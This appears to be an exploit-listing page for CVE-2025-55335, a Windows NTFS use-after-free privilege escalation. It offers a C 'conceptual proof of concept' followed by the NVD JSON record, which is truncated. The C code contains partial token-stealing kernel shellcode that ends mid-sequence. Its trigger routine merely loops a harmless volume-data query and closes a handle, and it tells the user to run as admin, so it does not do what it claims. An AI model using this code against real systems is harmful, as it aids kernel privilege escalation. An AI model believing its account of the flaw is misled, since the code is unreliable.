CVE-2025-55335

// CVE-2025-55335 - Windows NTFS Use After Free Local Privilege Escalation // Conceptual PoC - triggers UAF in NTFS driver via crafted filesystem operations // Note: This is a conceptual demonstration. Actual exploitation requires kernel pool manipulation. #include <windows.h> #include <stdio.h> #include <stdlib.h> // Token stealing shellcode for x64 (conceptual) // In real exploit, this would be placed in executable memory after gaining RIP control unsigned char token_stealing_shellcode[] = { // mov rax, [gs:0x188] ; Current thread (_ETHREAD) // mov rax, [rax + 0x2c0] ; _EPROCESS (may vary by build) // mov rcx, rax ; Save current process // find_system_process_loop: // mov rdx, [rax + 0x2e8] ; ActiveProcessLinks (offset varies) // sub rax, 0x2e8 // mov rax, [rdx] ; Next link // cmp dword ptr [rax - 0x8], 4 ; UniqueProcessId == 4 (System) // jne find_system_process_loop // mov rax, [rax + 0x358] ; System process token (offset varies) // mov [rcx + 0x358], rax ; Replace current token // ret 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xC0, 0x02, 0x00, 0x00, 0x48, 0x89, 0xC1, 0x48, 0x89, 0xCA }; // Trigger NTFS UAF by creating and rapidly manipulating filesystem objects BOOL TriggerNtfsUaf() { HANDLE hFile; char buffer[1024]; DWORD bytesReturned; BOOL success = FALSE; printf("[*] CVE-2025-55335 - NTFS Use After Free PoC\n"); printf("[*] Attempting to trigger UAF condition...\n"); // Step 1: Create a target file to trigger NTFS metadata operations hFile = CreateFileA("C:\\Windows\\Temp\\uaf_target.dat", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { printf("[-] Failed to create target file. Run as admin.\n"); return FALSE; } // Step 2: Trigger filesystem control operations that cause UAF // Use FSCTL to send crafted requests to NTFS driver for (int i = 0; i < 100; i++) { DeviceIoControl(hFile, FSCTL_GET_NTFS_VOLUME_DATA, NULL, 0, buffer, sizeof(buffer), &bytesReturned, NULL); } // Step 3: Close handle to free the kernel object // The NTFS driver may still hold a stale reference -> UAF CloseHandle(hFile); printf("[*] UAF condition triggered. Kernel pool spray needed for exploitation.\n"); printf("[*] In a full exploit, spray kernel pool and hijack control flow.\n"); return TRUE; } int main(int argc, char* argv[]) { TriggerNtfsUaf(); printf("[*] PoC execution complete.\n"); return 0; }

{"cve": {"id": "CVE-2025-55335", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:46.787", "lastModified": "2025-10-27T14:39:58.143", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Windows NTFS allows an unauthorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-416"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.10240.21161", "matchCriteriaId": "9D5EB1D1-8C53-4188-90B9-8ED2FD2837BD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "A6CE9E60-F2F1-43F2-A535-5326E903D219"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "B51B700D-B45F-4A8E-9F78-67A1282B3BEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6456", "matchCriteriaId": "1485A427-10FF-4C39-9911-4C6F1820BE7F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6456", "matchCriteriaId": "26CAACAA-3FE8-4740-8CF2-6BF3D069C47F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22621.6060", "matchCriteriaId": "6F387FA2-66C8-4B70-A537-65806271F16A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6060", "matchCriteriaId": "A3FEBF91-5010-4C84-B93A-6EFA4838185A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "41E9F7AC-8E6D-43A0-A157-48A5E0B5BD0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.6899", "matchCriteriaId": "3B77A066-4F79-4B1F-AECF-58DB4C651EA5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "matchCriteriaId": "5F422A8C-2C4E-42C8-B420-E0728037E15C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "matchCriteriaId": "2ACA9287-B475-4AF7-A4DA-A7143CEF9E57"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8519", "matchCriteriaId": "7A8CC16F-8B44-4E7D-8503-25D753387345"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.6899", "matchCriteriaId": "72C1771B-635B-41E3-84AF-8822467A1869"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guid ... (truncated)